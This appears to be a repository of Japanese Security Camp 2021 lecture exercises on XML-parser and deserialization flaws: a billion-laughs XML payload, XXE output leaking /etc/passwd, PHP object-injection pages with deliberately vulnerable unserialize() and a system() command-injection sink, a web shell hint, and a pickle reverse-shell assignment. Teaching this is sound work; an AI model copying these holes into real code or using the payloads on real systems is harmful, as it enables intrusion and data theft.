--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | import defusedxml.sax
 6 | 
 7 | class ExampleContentHandler(sax.ContentHandler):
 8 |     def __init__(self):
 9 |         sax.ContentHandler.__init__(self)
10 |  
11 |     def startElement(self, name, attrs):
12 |         pass
13 |  
14 |     def endElement(self, name):
15 |         pass
16 |  
17 |     def characters(self, content):
18 |         pass
19 | 
20 | data = b'''\
21 | <?xml version="1.0"?>
22 | <!DOCTYPE lolz [
23 |     <!ENTITY lol "lol">
24 |     <!ELEMENT lolz (#PCDATA)>
25 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
26 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
27 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
28 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
29 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
30 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
31 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
32 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
33 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
34 | ]>
35 | <lolz>&lol9;</lolz>
36 | '''
37 | 
38 | defusedxml.sax.parseString(data, ExampleContentHandler())
39 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求
 2 | セキュリティ・キャンプ 全国大会 2021 オンラインで実施された講義中で用いた演習のためのファイルや、事前課題とその解説のためのファイルを配布するためのリポジトリです。
 3 | 
 4 | - [講義スライド](https://speakerdeck.com/tkmru/seccamp2021-b5)
 5 | - [講義紹介ページ](https://www.ipa.go.jp/jinzai/camp/2021/zenkoku2021_program_list.html#list_b5)
 6 | 
 7 | ## 講義概要
 8 | 
 9 | ```
10 | 各プログラミング言語で標準的に用いられているライブラリには、セキュリティを考慮していないものが多く見受けられます。
11 | 例えば、各プログラミング言語に標準で備わっているXMLパーサは、セキュリティを考慮していないものが多いです。
12 | 本講義では、XMLファイルの扱いの不備に関する攻撃手法/対策方法を一例として取り上げ、各プログラミング言語の標準ライブラリの問題点を見ていきます。
13 | また、実際にOSSの脆弱性を見つける演習を実施したいと考えています。
14 | この講義を受けることで、脆弱性を生み出さないよう気をつけるポイント、脆弱性を見つけるためのポイントを学べるでしょう。
15 | ```
16 | 
17 | ## 参考資料
18 | - [Insecure deserialization | Web Security Academy](https://portswigger.net/web-security/deserialization)
19 | - [What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy](https://portswigger.net/web-security/xxe)
20 | - [Utilizing Code Reuse/ROP in PHP Application Exploits | OWASP](https://owasp.org/www-pdf-archive/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf)
21 | - [Practical PHP Object Injection | INSOMNIA](https://insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf)
22 | - [A Hands-on XML External Entity Vulnerability Training Module | SANS](https://www.sans.org/reading-room/whitepapers/application/hands-on-xml-external-entity-vulnerability-training-module-34397)
23 | - [defusedxml · PyPI](https://pypi.org/project/defusedxml/#python-xml-libraries)
24 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.0/README.md:
--------------------------------------------------------------------------------
 1 | # External entity expansion on pulldom
 2 | 
 3 | ```
 4 | $ docker build . -t external-entity-expansion-pulldom
 5 | $ docker run external-entity-expansion-pulldom
 6 | START_DOCUMENT <xml.dom.minidom.Document object at 0x7fdd379eb648>
 7 | START_ELEMENT <DOM Element: data at 0x7fdd378100e0>
 8 | CHARACTERS <DOM Text node "'\n'">
 9 | CHARACTERS <DOM Text node "'  '">
10 | CHARACTERS <DOM Text node "'root:x:0:0'...">
11 | CHARACTERS <DOM Text node "'\n'">
12 | CHARACTERS <DOM Text node "'daemon:x:1'...">
13 | CHARACTERS <DOM Text node "'\n'">
14 | CHARACTERS <DOM Text node "'bin:x:2:2:'...">
15 | CHARACTERS <DOM Text node "'\n'">
16 | CHARACTERS <DOM Text node "'sys:x:3:3:'...">
17 | CHARACTERS <DOM Text node "'\n'">
18 | CHARACTERS <DOM Text node "'sync:x:4:6'...">
19 | CHARACTERS <DOM Text node "'\n'">
20 | CHARACTERS <DOM Text node "'games:x:5:'...">
21 | CHARACTERS <DOM Text node "'\n'">
22 | CHARACTERS <DOM Text node "'man:x:6:12'...">
23 | CHARACTERS <DOM Text node "'\n'">
24 | CHARACTERS <DOM Text node "'lp:x:7:7:l'...">
25 | CHARACTERS <DOM Text node "'\n'">
26 | CHARACTERS <DOM Text node "'mail:x:8:8'...">
27 | CHARACTERS <DOM Text node "'\n'">
28 | CHARACTERS <DOM Text node "'news:x:9:9'...">
29 | CHARACTERS <DOM Text node "'\n'">
30 | CHARACTERS <DOM Text node "'uucp:x:10:'...">
31 | CHARACTERS <DOM Text node "'\n'">
32 | CHARACTERS <DOM Text node "'proxy:x:13'...">
33 | CHARACTERS <DOM Text node "'\n'">
34 | CHARACTERS <DOM Text node "'www-data:x'...">
35 | CHARACTERS <DOM Text node "'\n'">
36 | CHARACTERS <DOM Text node "'backup:x:3'...">
37 | CHARACTERS <DOM Text node "'\n'">
38 | CHARACTERS <DOM Text node "'list:x:38:'...">
39 | CHARACTERS <DOM Text node "'\n'">
40 | CHARACTERS <DOM Text node "'irc:x:39:3'...">
41 | CHARACTERS <DOM Text node "'\n'">
42 | CHARACTERS <DOM Text node "'gnats:x:41'...">
43 | CHARACTERS <DOM Text node "'\n'">
44 | CHARACTERS <DOM Text node "'nobody:x:6'...">
45 | CHARACTERS <DOM Text node "'\n'">
46 | CHARACTERS <DOM Text node "'_apt:x:100'...">
47 | CHARACTERS <DOM Text node "'\n'">
48 | CHARACTERS <DOM Text node "'\n'">
49 | END_ELEMENT <DOM Element: data at 0x7fdd378100e0>
50 | ```
51 | 


--------------------------------------------------------------------------------
/exercise/object-injection/src/level0.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="ja">
 3 | <head>
 4 |   <meta charset="utf-8">
 5 |   <title>Level0</title>
 6 |   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
 7 |   <link rel='stylesheet prefetch' href='https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.2/css/bulma.min.css'>
 8 | </head>
 9 | <body>
10 | <nav class="navbar is-light" role="navigation" aria-label="main navigation">
11 |   <div class="navbar-brand">
12 |     <span class="navbar-item">
13 |       <span class="icon-text is-large">
14 |         <span class="fa fa-language">PHP Object Injection Exercise</span>
15 |       </span>
16 |     </span>
17 |   </div>
18 |   <div class="navbar-menu">
19 |     <div class="navbar-start">
20 |       <a class="navbar-item" href="./">
21 |         Home
22 |       </a>
23 |     </div>
24 |   </div>
25 | </nav>
26 | <br>
27 | 
28 | <div class="container">
29 | <h1 class="title">Level0</h1>
30 | <h2 class="subtitle">説明:</h1>
31 | <p>次のコードでは、Lectureクラスを<strong>serialize()</strong>によって文字列へシリアライズした後、その文字列を出力しています。</p>
32 | <p>その後、シリアライズされた文字列を<strong>unserialize()</strong>によってデシリアライズしています。</p>
33 | <p>マジックメソッド<strong>__wakeup()</strong>の挙動や、シリアライズされた文字列を確認してください。</p>
34 | <br>
35 | <h2 class="subtitle">コード:</h1>
36 | <pre>
37 | <code>
38 | class Lecture {
39 |   public $title = '趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求';
40 |   public $track = 'B';
41 |   public $year = 2021;
42 |   public function __wakeup() {
43 |     echo 'wakeup!!';
44 |   }
45 | }
46 |  
47 | $l = new Lecture();
48 | $serialized = serialize($l);
49 | echo htmlspecialchars($serialized);
50 | echo "&lt;br&gt;";
51 | echo "-------------------------------------------";
52 | echo "&lt;br&gt;";
53 | $unserialized = unserialize($serialized);
54 | </code>
55 | </pre>
56 | <br>
57 | <h2 class="subtitle">実行結果:</h2>
58 | <pre>
59 | <code>
60 | <?php
61 | class Lecture {
62 |   public $title = '趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求';
63 |   public $track = 'B';
64 |   public $year = 2021;
65 |   public function __wakeup() {
66 |     echo 'wakeup!!';
67 |   }
68 | }
69 |  
70 | $l = new Lecture();
71 | $serialized = serialize($l);
72 | echo htmlspecialchars($serialized);
73 | echo "<br>";
74 | echo "-------------------------------------------";
75 | echo "<br>";
76 | $unserialized = unserialize($serialized);
77 | ?>
78 | </code>
79 | </pre>
80 | </div>
81 | <br>
82 | 
83 | <footer class="footer">
84 | <div class="has-text-centered">
85 | Copyright © 2021 <a href="https://github.com/tkmru"><b>tkmru</b></a>.
86 | </div>
87 | </footer>
88 | </body>
89 | </html>


--------------------------------------------------------------------------------
/exercise/object-injection/src/level1.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="ja">
 3 | <head>
 4 |   <meta charset="utf-8">
 5 |   <title>Level1</title>
 6 |   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
 7 |   <link rel='stylesheet prefetch' href='https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.2/css/bulma.min.css'>
 8 | </head>
 9 | <body>
10 | <nav class="navbar is-light" role="navigation" aria-label="main navigation">
11 |   <div class="navbar-brand">
12 |     <span class="navbar-item">
13 |       <span class="icon-text is-large">
14 |         <span class="fa fa-language">PHP Object Injection Exercise</span>
15 |       </span>
16 |     </span>
17 |   </div>
18 |   <div class="navbar-menu">
19 |     <div class="navbar-start">
20 |       <a class="navbar-item" href="./">
21 |         Home
22 |       </a>
23 |     </div>
24 |   </div>
25 | </nav>
26 | <br>
27 | 
28 | <div class="container">
29 | <h1 class="title">Level1</h1>
30 | <h2 class="subtitle">説明:</h1>
31 | <p>次のコードでは、Settingクラスを<strong>serialize()</strong>によって文字列へシリアライズした後、その文字列を出力しています。</p>
32 | <p>その後、objectパラメータが存在する場合はobjectパラメータを、存在しない場合はシリアライズされた文字列を<strong>unserialize()</strong>によってデシリアライズしています。</p>
33 | <p>objectパラメータでシリアライズされた文字列を指定し、<strong>/etc/passwd</strong>を読み取ってください。</p>
34 | <br>
35 | <p><strong>ヒント:</strong>objectパラメータの指定の仕方 <code>http://localhost:5000/level1.php?object=O:7:"Setting":1:{s:4:"path";s:11:"config.json";}</code></p>
36 | <br>
37 | <h2 class="subtitle">コード:</h1>
38 | <pre>
39 | <code>
40 | class Setting {
41 |   public $path = "config.json";
42 |   public function __wakeup() {
43 |     $content = file_get_contents($this->path);
44 |     echo $content;
45 |   }
46 | }
47 |  
48 | $setting = new Setting();
49 | $serialized = serialize($setting);
50 | echo htmlspecialchars($serialized);
51 | echo "&lt;br&gt;";
52 | echo "-------------------------------------------";
53 | echo "&lt;br&gt;";
54 | if(isset($_GET["object"])){
55 |   unserialize($_GET["object"]);
56 | } else {
57 |   unserialize($serialized);
58 | }
59 | </code>
60 | </pre>
61 | <br>
62 | <h2 class="subtitle">実行結果:</h2>
63 | <pre>
64 | <code>
65 | <?php
66 | class Setting {
67 |   public $path = "config.json";
68 |   public function __wakeup() {
69 |     $content = file_get_contents($this->path);
70 |     echo $content;
71 |   }
72 | }
73 |  
74 | $setting = new Setting();
75 | $serialized = serialize($setting);
76 | echo htmlspecialchars($serialized);
77 | echo "<br>";
78 | echo "-------------------------------------------";
79 | echo "<br>";
80 | if(isset($_GET["object"])){
81 |   unserialize($_GET["object"]);
82 | } else {
83 |   unserialize($serialized);
84 | }
85 | ?>
86 | </code>
87 | </pre>
88 | </div>
89 | <br>
90 | <footer class="footer">
91 | <div class="has-text-centered">
92 | Copyright © 2021 <a href="https://github.com/tkmru"><b>tkmru</b></a>.
93 | </div>
94 | </footer>
95 | </body>
96 | </html>
97 | 
98 | 
99 | 


--------------------------------------------------------------------------------
/exercise/object-injection/src/level2.php:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="ja">
  3 | <head>
  4 |   <meta charset="utf-8">
  5 |   <title>Level2</title>
  6 |   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
  7 |   <link rel='stylesheet prefetch' href='https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.2/css/bulma.min.css'>
  8 | </head>
  9 | <body>
 10 | <nav class="navbar is-light" role="navigation" aria-label="main navigation">
 11 |   <div class="navbar-brand">
 12 |     <span class="navbar-item">
 13 |       <span class="icon-text is-large">
 14 |         <span class="fa fa-language">PHP Object Injection Exercise</span>
 15 |       </span>
 16 |     </span>
 17 |   </div>
 18 |   <div class="navbar-menu">
 19 |     <div class="navbar-start">
 20 |       <a class="navbar-item" href="./">
 21 |         Home
 22 |       </a>
 23 |     </div>
 24 |   </div>
 25 | </nav>
 26 | <br>
 27 | 
 28 | <div class="container">
 29 | <h1 class="title">Level2</h1>
 30 | <h2 class="subtitle">説明:</h2>
 31 | <p>次のコードでは、Mainクラスを<strong>serialize()</strong>によって文字列へシリアライズした後、その文字列を出力しています。</p>
 32 | <p>その後、objectパラメータが存在する場合はobjectパラメータを、存在しない場合はシリアライズされた文字列を<strong>unserialize()</strong>によってデシリアライズしています。</p>
 33 | <p>objectパラメータでシリアライズされた文字列を指定し、<strong>/etc/passwd</strong>を読み取ってください。</p>
 34 | <br>
 35 | <h2 class="subtitle">コード:</h2>
 36 | <pre>
 37 | <code>
 38 | class Setting {
 39 |   public $path = "config.json";
 40 |   public function read() {
 41 |     $content = file_get_contents($this->path);
 42 |     echo $content;
 43 |   }
 44 | }
 45 | 
 46 | class Main {
 47 |   public $file = null;
 48 |   public function __destruct(){
 49 |     $this->file->read();
 50 |   }
 51 | }
 52 | 
 53 | $main = new Main();
 54 | $serialized = serialize($main);
 55 | echo htmlspecialchars($serialized);
 56 | echo "&lt;br&gt;";
 57 | echo "-------------------------------------------";
 58 | echo "&lt;br&gt;";
 59 | if(isset($_GET["object"])){
 60 |   unserialize($_GET["object"]);
 61 | } else {
 62 |   echo "objectパラメータを設定してください";
 63 | }
 64 | </code>
 65 | </pre>
 66 | <br>
 67 | <h2 class="subtitle">実行結果:</h2>
 68 | <pre>
 69 | <code>
 70 | <?php
 71 | class Setting {
 72 |   public $path = "config.json";
 73 |   public function read() {
 74 |     $content = file_get_contents($this->path);
 75 |     echo $content;
 76 |   }
 77 | }
 78 | 
 79 | class Main {
 80 |   public $file = null;
 81 |   public function __destruct(){
 82 |     $this->file->read();
 83 |   }
 84 | }
 85 | 
 86 | $main = new Main();
 87 | $serialized = serialize($main);
 88 | echo htmlspecialchars($serialized);
 89 | echo "<br>";
 90 | echo "-------------------------------------------";
 91 | echo "<br>";
 92 | if(isset($_GET["object"])){
 93 |   unserialize($_GET["object"]);
 94 | } else {
 95 |   echo "objectパラメータを設定してください";
 96 | }
 97 | ?>
 98 | </code>
 99 | </pre>
100 | </div>
101 | <br>
102 | <footer class="footer">
103 | <div class="has-text-centered">
104 | Copyright © 2021 <a href="https://github.com/tkmru"><b>tkmru</b></a>.
105 | </div>
106 | </footer>
107 | </body>
108 | </html>
109 | 
110 | 
111 | 


--------------------------------------------------------------------------------
/exercise/object-injection/src/level3.php:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="ja">
  3 | <head>
  4 |   <meta charset="utf-8">
  5 |   <title>Level3</title>
  6 |   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
  7 |   <link rel='stylesheet prefetch' href='https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.2/css/bulma.min.css'>
  8 | </head>
  9 | <body>
 10 | <nav class="navbar is-light" role="navigation" aria-label="main navigation">
 11 |   <div class="navbar-brand">
 12 |     <span class="navbar-item">
 13 |       <span class="icon-text is-large">
 14 |         <span class="fa fa-language">PHP Object Injection Exercise</span>
 15 |       </span>
 16 |     </span>
 17 |   </div>
 18 |   <div class="navbar-menu">
 19 |     <div class="navbar-start">
 20 |       <a class="navbar-item" href="./">
 21 |         Home
 22 |       </a>
 23 |     </div>
 24 |   </div>
 25 | </nav>
 26 | <br>
 27 | 
 28 | <div class="container">
 29 | <h1 class="title">Level3</h1>
 30 | <h2 class="subtitle">説明:</h2>
 31 | <p>次のコードでは、Mainクラスを<strong>serialize()</strong>によって文字列へシリアライズした後、その文字列を出力しています。</p>
 32 | <p>その後、objectパラメータが存在する場合はobjectパラメータを、存在しない場合はシリアライズされた文字列を<strong>unserialize()</strong>によってデシリアライズしています。</p>
 33 | <p>objectパラメータでシリアライズされた文字列を指定し、<strong>web shell</strong>を配置し任意コード実行を成功させてください。</p>
 34 | <br>
 35 | <p><strong>ヒント:</strong>web shellの例 <code>&lt;?php system($_GET["cmd"]);?&gt;</code></p>
 36 | 
 37 | <br>
 38 | <h2 class="subtitle">コード:</h2>
 39 | <pre>
 40 | <code>
 41 | class Setting {
 42 |   public $path = "config.json";
 43 |   public function read() {
 44 |     system("cat " . $this->path);
 45 |   }
 46 | }
 47 | 
 48 | class Main {
 49 |   public $file = null;
 50 |   public function __destruct(){
 51 |     $this->file->read();
 52 |   }
 53 | }
 54 | 
 55 | $main = new Main();
 56 | $serialized = serialize($main);
 57 | echo htmlspecialchars($serialized);
 58 | echo "&lt;br&gt;";
 59 | echo "-------------------------------------------";
 60 | echo "&lt;br&gt;";
 61 | if(isset($_GET["object"])){
 62 |   unserialize($_GET["object"]);
 63 | } else {
 64 |   echo "objectパラメータを設定してください";
 65 | }
 66 | </code>
 67 | </pre>
 68 | <br>
 69 | <h2 class="subtitle">実行結果:</h2>
 70 | <pre>
 71 | <code>
 72 | <?php
 73 | class Setting {
 74 |   public $path = "config.json";
 75 |   public function read() {
 76 |     system("cat " . $this->path);
 77 |   }
 78 | }
 79 | 
 80 | class Main {
 81 |   public $file = null;
 82 |   public function __destruct(){
 83 |     $this->file->read();
 84 |   }
 85 | }
 86 | 
 87 | $main = new Main();
 88 | $serialized = serialize($main);
 89 | echo htmlspecialchars($serialized);
 90 | echo "<br>";
 91 | echo "-------------------------------------------";
 92 | echo "<br>";
 93 | if(isset($_GET["object"])){
 94 |   unserialize($_GET["object"]);
 95 | } else {
 96 |   echo "objectパラメータを設定してください";
 97 | }
 98 | ?>
 99 | </code>
100 | </pre>
101 | </div>
102 | <br>
103 | <footer class="footer">
104 | <div class="has-text-centered">
105 | Copyright © 2021 <a href="https://github.com/tkmru"><b>tkmru</b></a>.
106 | </div>
107 | </footer>
108 | </body>
109 | </html>
110 | 
111 | 
112 | 


--------------------------------------------------------------------------------
/zizen-kadai/README.md:
--------------------------------------------------------------------------------
  1 | # 事前課題
  2 | 
  3 | ## 課題0
  4 | 講義では次のソフトウェアを用いる予定です。それぞれを使っているパソコンにインストールしておいてください。
  5 | 
  6 | - PHP
  7 |   - [PHP: インストールと設定 - Manual](https://www.php.net/manual/ja/install.php)
  8 | - Python
  9 |   - [Python モジュールのインストール — Python 3.9.4 ドキュメント](https://docs.python.org/ja/3/installing/index.html)
 10 | - Docker
 11 |   - [Docker のインストール — Docker-docs-ja 19.03 ドキュメント](http://docs.docker.jp/engine/installation/)
 12 | 
 13 | ## 課題1
 14 | 本講義ではXMLファイルの扱いの不備に関する攻撃手法を扱います。
 15 | Ghidraというリバースエンジニアリングツールには、XMLファイル関連のCVEがついている脆弱性がいくつかあります。
 16 | いずれか好きなものを選び、実際に脆弱性を攻撃してください。
 17 | 脆弱性に該当するバージョンのGhidraをダウンロード(https://ghidra-sre.org/releaseNotes_9.1.html )し、インストールすることで、再現環境を作成できます。
 18 | また、どのように脆弱性を攻撃したのかWriteupを書いてください。
 19 | 
 20 | - CVE-2019-13625（https://github.com/NationalSecurityAgency/ghidra/issues/71 ）
 21 | - CVE-2019-16941（https://github.com/purpleracc00n/CVE-2019-16941 ）
 22 | 
 23 | ### 参考
 24 | - [Ghidra Installation Guide](https://ghidra-sre.org/InstallationGuide.html#InstallationNotes)
 25 | 
 26 | ※ 講義中ではGhidraを使ったり、リバースエンジニアリングをしたりしないので安心してください。
 27 | 
 28 | ## 課題2
 29 | 講義中にDockerによる演習環境を使って貰う予定です。
 30 | そのため、Dockerの使い方に慣れておいてほしいです。
 31 | PHPファイルをDockerfileを書いて実行してください。
 32 | DockerfileはDockerイメージを作成するための設定を記述しておくファイルです。
 33 | 
 34 | 次のDockerfileでは`/usr/src/myapp`に現在いるディレクトリの内容をコピーしたあと、
 35 | script.phpを実行しています。
 36 | ベースとなるDockerイメージにはDocker公式のイメージ（https://hub.docker.com/_/php ） を用いています。
 37 | 
 38 | ```
 39 | FROM php:7.4-cli
 40 | COPY . /usr/src/myapp
 41 | WORKDIR /usr/src/myapp
 42 | CMD [ "php", "./script.php" ]
 43 | ```
 44 | 
 45 | script.phpは、`Hello World!\n`と出力する次のようなスクリプトにしておきましょう。
 46 | 
 47 | ```
 48 | <?php 
 49 | echo "Hello World!\n";
 50 | ```
 51 | 
 52 | このDockerfileとscript.phpを作成したディレクトリでコマンドを実行することでDockerイメージを作成できます。
 53 | 
 54 | ```
 55 | $ docker build -t hello-app .
 56 | ```
 57 | 
 58 | 作成したイメージは次のコマンドで確認できます。
 59 | 
 60 | ```
 61 | $ docker images
 62 | REPOSITORY      TAG       IMAGE ID       CREATED         SIZE
 63 | hello-app       latest    2b1a37473724   9 seconds ago   420MB
 64 | ```
 65 | 
 66 | 次のコマンドでイメージからコンテナを起動できます。
 67 | 
 68 | ```
 69 | $ docker run hello-app
 70 | Hello World!
 71 | ```
 72 | 
 73 | 起動中のコンテナは次のコマンドで確認できます。
 74 | 今回作成したコンテナはscript.phpを実行したあとすぐに終了しているでしょう。
 75 | 
 76 | ```
 77 | $ docker ps -a
 78 | CONTAINER ID   IMAGE           COMMAND                  CREATED          STATUS                      PORTS                      NAMES
 79 | 50892905f3d5   hello-app       "docker-php-entrypoi…"   47 seconds ago   Exited (0) 46 seconds ago                              brave_cohen
 80 | ```
 81 | 
 82 | `docker start <コンテナID>`で作成済みのコンテナを再度実行できます。
 83 | コンテナIDは上記の`docker ps -a`で確認できます。
 84 | 
 85 | ```
 86 | $ docker start a9057a892f90
 87 | a9057a892f90
 88 | ```
 89 | 
 90 | Dockerの操作に慣れたらイメージとコンテナを削除してください。
 91 | イメージIDは`docker images`で確認できます。
 92 | 
 93 | ```
 94 | $ docker rmi <イメージID>
 95 | $ docker rm <コンテナID>
 96 | ```
 97 | 
 98 | この課題では提出物はありません。
 99 | 
100 | ## 課題3
101 | 応募課題にあって選択問題Eを解いてください。
102 | 応募時に解いた人はこの課題はスキップしてもらって大丈夫です。
103 | 以下選択問題Eの問題文です。小問1、小問2の解答を提出してください。
104 | 
105 | Pythonにはpickleという標準モジュールがあります。[pickleの公式ドキュメント](https://docs.python.org/ja/3/library/pickle.html)に記載されているように、pickleで信頼できない値をデシリアライズすることは脆弱性の原因となり得ます。その理由および攻撃手法について、以下の小問(1)(2)に回答してください。
106 | 
107 | **小問(1)** 何故、脆弱性となるのかを説明してください（必須回答）
108 | 
109 | **小問(2)** 以下のPythonのソースコードには上記の脆弱性が存在します。この脆弱性を用いて、TCPの1234番ポートに対するリバースシェルを作成してください。netcatで1234番ポートを待ち受けておき、接続が確立した後、lsなどのコマンドを打ち込み結果が返ってくれば正解です。リバースシェルを確立させることのできるBase64文字列と、この文字列を生成するPoC（実証コード）の両方を提出してください（必須回答）
110 | 
111 | ```
112 | #!/usr/bin/env python3
113 | import sys
114 | import base64
115 | import pickle
116 | 
117 | args = sys.argv
118 | if len(args) != 2:
119 |     print('第一引数にBase64エンコードされた文字列を指定してください')
120 | 
121 | try:
122 |     data = base64.urlsafe_b64decode(args[1])
123 |     deserialized = pickle.loads(data)
124 |     print('deserialized: {0}'.format(deserialized))
125 | except:
126 |     print('Failed to deserialize')
127 | ```
128 | 
129 | 


--------------------------------------------------------------------------------